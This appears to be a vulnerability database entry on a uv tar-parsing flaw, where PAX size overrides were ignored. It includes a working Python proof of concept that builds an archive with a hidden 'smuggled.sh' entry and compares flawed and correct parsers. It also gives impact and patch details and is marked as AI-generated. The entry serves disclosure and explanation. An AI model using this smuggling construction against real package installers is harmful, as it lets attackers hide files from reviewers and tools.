
Cloud Vulnerability DB
A community-led vulnerabilities database
The vulnerability (GHSA-w476-p2h3-79g9) affects uv versions 0.9.4 and earlier, in which tar archives containing PAX extended headers with a file size override were not parsed correctly. It was disclosed on October 21, 2025, and affects the Python package installer uv. The root cause is a flaw in the underlying astral-tokio-tar dependency, which is tracked separately as CVE-2025-62518 (GitHub Advisory).
The flaw lies in inconsistent handling of PAX extended headers versus ustar headers when determining where an entry's file data ends. When a PAX extended header supplies a size override for the following entry, the parser advanced the stream position by the size recorded in the ustar header (often zero) instead of the PAX-specified size. It then read the entry's file content as if it were the next tar header, so an attacker could embed a second, hidden set of entries inside a file body that a PAX-aware extractor treats as plain data. The issue was fixed in astral-tokio-tar version 0.5.6, which was incorporated into uv version 0.9.5 (GitHub Release).
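To make the parsing flaw concrete, the following is an added Python example, not code from uv or astral-tokio-tar. It constructs a small tar archive by hand: a PAX extended header carrying a `size` record, followed by a ustar header for `payload.bin` whose own size field is zero, followed by the real file body, which has been crafted to look like a tar header for a second file `smuggled.sh` plus its data (all names and contents are made up). A minimal tar walker is then run in two modes: `honor_pax_size=False` models the behaviour described above (report the PAX size but advance the stream by the ustar size), and `honor_pax_size=True` models the corrected behaviour. CPython's `tarfile` module is used as a reference parser that honours the PAX override.

```python
import io
import tarfile

BLOCK = 512


def _octal(value: int, width: int) -> bytes:
    """Encode an integer as a NUL-terminated octal ustar field."""
    return ("%0*o" % (width - 1, value)).encode("ascii") + b"\0"


def pad(data: bytes) -> bytes:
    """Pad data out to a whole number of 512-byte tar blocks."""
    return data + b"\0" * (-len(data) % BLOCK)


def make_header(name: str, size: int, typeflag: bytes) -> bytes:
    """Build a 512-byte ustar header with a valid checksum."""
    hdr = bytearray(BLOCK)
    hdr[0:len(name)] = name.encode("ascii")
    hdr[100:108] = _octal(0o644, 8)        # mode
    hdr[108:116] = _octal(0, 8)            # uid
    hdr[116:124] = _octal(0, 8)            # gid
    hdr[124:136] = _octal(size, 12)        # size (ustar field)
    hdr[136:148] = _octal(0, 12)           # mtime
    hdr[148:156] = b" " * 8                # checksum field is spaces while summing
    hdr[156:157] = typeflag
    hdr[257:263] = b"ustar\0"
    hdr[263:265] = b"00"
    hdr[148:156] = ("%06o" % sum(hdr)).encode("ascii") + b"\0 "
    return bytes(hdr)


def pax_record(key: str, value: str) -> bytes:
    """Encode one PAX record '<len> <key>=<value>\\n'; <len> counts itself."""
    body = f" {key}={value}\n"
    length = len(body) + len(str(len(body)))
    while len(str(length)) + len(body) != length:
        length += 1
    return f"{length}{body}".encode("ascii")


def build_archive() -> bytes:
    """Constructed archive (hypothetical names): one legitimate file whose real
    size is given only by a PAX 'size' record, and whose body is itself a valid
    tar header plus data for a second, 'smuggled' entry."""
    inner_content = b"echo pwned\n"
    payload = make_header("smuggled.sh", len(inner_content), b"0") + pad(inner_content)
    pax_data = pax_record("size", str(len(payload)))
    return (
        make_header("PaxHeaders/payload.bin", len(pax_data), b"x") + pad(pax_data)
        + make_header("payload.bin", 0, b"0")   # ustar size 0; PAX says 1024
        + payload
        + b"\0" * (2 * BLOCK)                   # end-of-archive marker
    )


def parse_pax(data: bytes) -> dict:
    """Parse PAX extended-header records into a dict of str -> str."""
    records, pos = {}, 0
    while pos < len(data):
        length_str = data[pos:].split(b" ", 1)[0]
        length = int(length_str)
        record = data[pos + len(length_str) + 1:pos + length]
        key, value = record.rstrip(b"\n").split(b"=", 1)
        records[key.decode()] = value.decode()
        pos += length
    return records


def list_entries(archive: bytes, honor_pax_size: bool) -> list:
    """Minimal tar walker returning (name, size) pairs. With honor_pax_size=False
    it reproduces the flaw described in the advisory: the PAX size is reported,
    but the stream is advanced by the ustar size, so the file body is read as
    the next header and the smuggled entry appears."""
    entries, pending, pos = [], {}, 0
    while pos + BLOCK <= len(archive):
        hdr = archive[pos:pos + BLOCK]
        if hdr == b"\0" * BLOCK:
            break
        name = hdr[0:100].split(b"\0", 1)[0].decode("ascii")
        ustar_size = int(hdr[124:136].split(b"\0", 1)[0] or b"0", 8)
        typeflag = hdr[156:157]
        pos += BLOCK
        if typeflag == b"x":
            pending = parse_pax(archive[pos:pos + ustar_size])
            pos += len(pad(archive[pos:pos + ustar_size]))
            continue
        size = int(pending.get("size", ustar_size))
        pending = {}
        entries.append((name, size))
        skip = size if honor_pax_size else ustar_size
        pos += (skip + BLOCK - 1) // BLOCK * BLOCK
    return entries


def stdlib_names(archive: bytes) -> list:
    """Reference behaviour: CPython's tarfile honours the PAX size override."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:") as tf:
        return tf.getnames()


if __name__ == "__main__":
    archive = build_archive()
    print("flawed walker: ", list_entries(archive, honor_pax_size=False))
    print("correct walker:", list_entries(archive, honor_pax_size=True))
    print("tarfile:       ", stdlib_names(archive))
```

The flawed walker lists `payload.bin` and then `smuggled.sh`, while the corrected walker and `tarfile` list only `payload.bin`, whose 1024-byte body happens to contain the smuggled header and script as inert data. That difference between extractors is exactly the effect the advisory describes.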
The impact of this vulnerability is considered low despite the underlying astral-tokio-tar vulnerability being rated as high. This is because uv only processes tar archives from source distributions, which already possess the capability for full arbitrary code execution by design. An attacker could create a source distribution that would extract differently when installed via uv versus other Python package installers, but this doesn't grant additional capabilities beyond what's already possible with source distributions (GitHub Advisory).
The vulnerability has been patched in uv version 0.9.5. Users are advised to upgrade to version 0.9.5 or newer to address this advisory. No breaking changes are expected as a result of the patch. The fix involves updating the astral-tokio-tar dependency to version 0.5.6, which contains the proper handling of PAX headers (GitHub Release).
Source: This report was generated using AI